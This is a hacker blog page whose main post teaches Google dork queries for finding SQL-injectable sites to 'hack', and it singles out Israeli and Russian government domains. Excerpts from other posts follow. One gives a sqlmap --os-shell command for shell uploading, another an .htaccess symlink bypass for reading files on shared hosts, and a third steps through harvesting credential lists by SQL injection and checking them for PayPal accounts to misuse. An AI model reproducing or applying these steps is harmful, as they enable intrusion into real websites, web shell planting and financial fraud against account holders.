Pro Method for finding vulnerable sites

Par MG -
Today I will be discussing how to find vulnerable sites left and right to add to your collect and increase your number of sites hacked a day.

what you need:
Web Country Codes
Google
List of Dorks!

[*] Finding Vuln SQLI sites via country code:
CODE: 
inurl:*.php?id= site:RU
This will search for Russian sites with the site: dork and look for pages with ANYTHING.php?id=


[*] Targeting Specific Sites:

 This helps decrease the time it takes to find a vuln rather than looking manually through the whole site.



[*]
CODE: 
inurl:**.php?id= site:www.target.com
The BIG stuff:

 As you may have guessed, yes this will look for Israel Government sites with ANYTHING.php?id= in the URL. Dont forget you can change **.php?id= to any of your favorite dorks like **.php?catid= etc..
CODE: 
.gov inurl:**.php?id= site:IL
Conclusion:
Yes this was short and sweet but very helpful for beginners and those who are looking for new sites to hack. Get creative with your dorks.


Might Get a hit on a high profile site, use your imagination
CODE: 
intitle:Satellite Operations inurl:**.php?id= site:.gov.ru

Commentaires

Enregistrer un commentaire

Posts les plus consultés de ce blog

RDP access & Shell uploading trough SQLMAP

Par MG -
Image
Hey Salam Guyz Today i'll tell y0uh  Shell Uploading through SQLmap its very easy if you have few thing ;) -1st- Vulnerable website with full path -2nd- file write privilleges -3rd- sqlmap -4th- Me :D start it open your sqlmap i have sqlmap with its GUI so work becomes very easy :D you can also use sqlmap shell without its GUI just type this ./sqlmap.py -u http:www.site.in/index.php?id=1 --os-shell link to use sqlmap with GUI Here 1st tick on the url box now paste the vulnerable link in target box than click on Get Query and you'll see website appears on the  "Query To Sqlmap box" like in picture Now 0pen "Access" tab in sqlmap than => operating System than => sqlshell and tick sqlshell  then again click on Get query Than click on start button than windows will pop up after 1-2 minutes  it will ask y0u f0r enter Web application Language like in this pic web server ...
Lire la suite

Bypass Symlink (Priv8)

Par MG -
Image
How you can bypass Symlink in linux webserver ? 1/ Create a folder   2/ Upload inside   ".htaccess"     CODE:   Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any   3/ Bypass manually ln -s /home/user/public_html/t0ph4cking.txt        Enjoy :D
Lire la suite

How to get alot of Paypal Account's

Par MG -
Image
Hi Guys today i'll show u how to get alot of paypal account's so u can use them to buy something in the net or doing much more things Okay let's Goo first u need to get a mail list with password  - How ? use sqli and access to database u can find mail list u can use havij it easy and help u to do auto sqli u can download havij from here  and here's a list of sqli dork => dork now when u got the maillist+pass u have to check it if has paypal accs so go to paypalchecker and put ur mailist there and socks5 u can get socks5 from here & click check it out EnjoY
Lire la suite